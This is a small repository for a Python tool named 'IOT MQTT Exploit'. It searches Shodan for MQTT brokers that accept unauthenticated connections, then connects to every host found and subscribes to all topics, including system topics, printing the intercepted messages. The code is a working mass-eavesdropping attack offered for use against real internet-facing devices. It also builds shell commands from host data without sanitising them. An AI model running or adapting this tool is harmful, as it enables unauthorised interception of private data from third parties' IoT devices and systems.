├── .gitattributes
├── .gitignore
├── README.md
├── mqtt.py
└── requirements.txt


/.gitattributes:
--------------------------------------------------------------------------------
 1 | # Auto detect text files and perform LF normalization
 2 | * text=auto
 3 | 
 4 | # Custom for Visual Studio
 5 | *.cs     diff=csharp
 6 | 
 7 | # Standard to msysgit
 8 | *.doc	 diff=astextplain
 9 | *.DOC	 diff=astextplain
10 | *.docx diff=astextplain
11 | *.DOCX diff=astextplain
12 | *.dot  diff=astextplain
13 | *.DOT  diff=astextplain
14 | *.pdf  diff=astextplain
15 | *.PDF	 diff=astextplain
16 | *.rtf	 diff=astextplain
17 | *.RTF	 diff=astextplain
18 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
 1 | # Windows image file caches
 2 | Thumbs.db
 3 | ehthumbs.db
 4 | 
 5 | # Folder config file
 6 | Desktop.ini
 7 | 
 8 | # Recycle Bin used on file shares
 9 | $RECYCLE.BIN/
10 | 
11 | # Windows Installer files
12 | *.cab
13 | *.msi
14 | *.msm
15 | *.msp
16 | 
17 | # Windows shortcuts
18 | *.lnk
19 | 
20 | # =========================
21 | # Operating System Files
22 | # =========================
23 | 
24 | # OSX
25 | # =========================
26 | 
27 | .DS_Store
28 | .AppleDouble
29 | .LSOverride
30 | 
31 | # Thumbnails
32 | ._*
33 | 
34 | # Files that might appear in the root of a volume
35 | .DocumentRevisions-V100
36 | .fseventsd
37 | .Spotlight-V100
38 | .TemporaryItems
39 | .Trashes
40 | .VolumeIcon.icns
41 | 
42 | # Directories potentially created on remote AFP share
43 | .AppleDB
44 | .AppleDesktop
45 | Network Trash Folder
46 | Temporary Items
47 | .apdisk
48 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | *IOT MQTT Exploit*
 2 | ============
 3 | 
 4 | ### An tool for search IOT MQTT vulnerable with shodan ###
 5 | 
 6 | 
 7 | # **Usage** #
 8 | 
 9 | `You need to change the SHODAN_API_KEY variable at mqtt.py. Check your token:` [https://account.shodan.io/](https://account.shodan.io/)
10 | 
11 | ## Capturing mqtt data from vulnerable hosts ##
12 | `python mqtt.py`
13 | 
14 | ## Considerations ##
15 | 
16 | `You can change the capture time in time.sleep (10) (default time).`
17 | `You can change the search term in TERM_TO_SEARCH.`
18 | 
19 | # **Author** #
20 | *Eddy Oliveira*
21 | * Website: [http://securityattack.com.br/](http://securityattack.com.br/)
22 | * Twitter: [https://twitter.com/securityattack](https://twitter.com/securityattack)
23 | * Linkedin: [https://www.linkedin.com/in/edvanoliveira/](https://www.linkedin.com/in/edvanoliveira/)


--------------------------------------------------------------------------------
/mqtt.py:
--------------------------------------------------------------------------------
 1 | import paho.mqtt.client as mqtt
 2 | import shodan
 3 | import time
 4 | import os
 5 | 
 6 | def search():
 7 | 
 8 | 	SHODAN_API_KEY = "API_KEY_SHODAN"
 9 | 	TERM_TO_SEARCH = "mqtt code 0"
10 | 	api = shodan.Shodan(SHODAN_API_KEY)
11 | 
12 | 	try:
13 | 		results = api.search(TERM_TO_SEARCH)
14 | 		os.system("rm teste -f")
15 |         	for result in results['matches']:
16 | 			searching = result['ip_str']
17 | 			os.system("echo %s" %searching + " >> teste")
18 | 
19 | 	except shodan.APIError, e:
20 | 		pass
21 | 
22 | def on_connect(client, userdata, rc, flags):
23 | 	client.subscribe('#', qos=1)
24 | 	client.subscribe('$SYS/#')
25 | 
26 | def on_message(client, userdata, message):
27 | 	print 'Topic: %s | QOS: %s  | Message: %s' % (message.topic, message.qos, message.payload)
28 | 
29 | def main():
30 | 
31 | 	f = open('teste')
32 | 	text = f.readlines()
33 | 	for final in text:
34 | 		print "IP: %s" %final
35 | 		client = mqtt.Client("Instance")
36 | 		client.on_connect = on_connect
37 | 		client.on_message = on_message
38 | 		client.connect(final)
39 | 		client.loop_start()
40 | 		time.sleep(10)
41 | 		client.loop_stop()
42 | 
43 | if __name__ == "__main__":
44 | 	search()
45 | 	main()
46 | 


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | paho-mqtt
2 | shodan
3 | time
4 | os


--------------------------------------------------------------------------------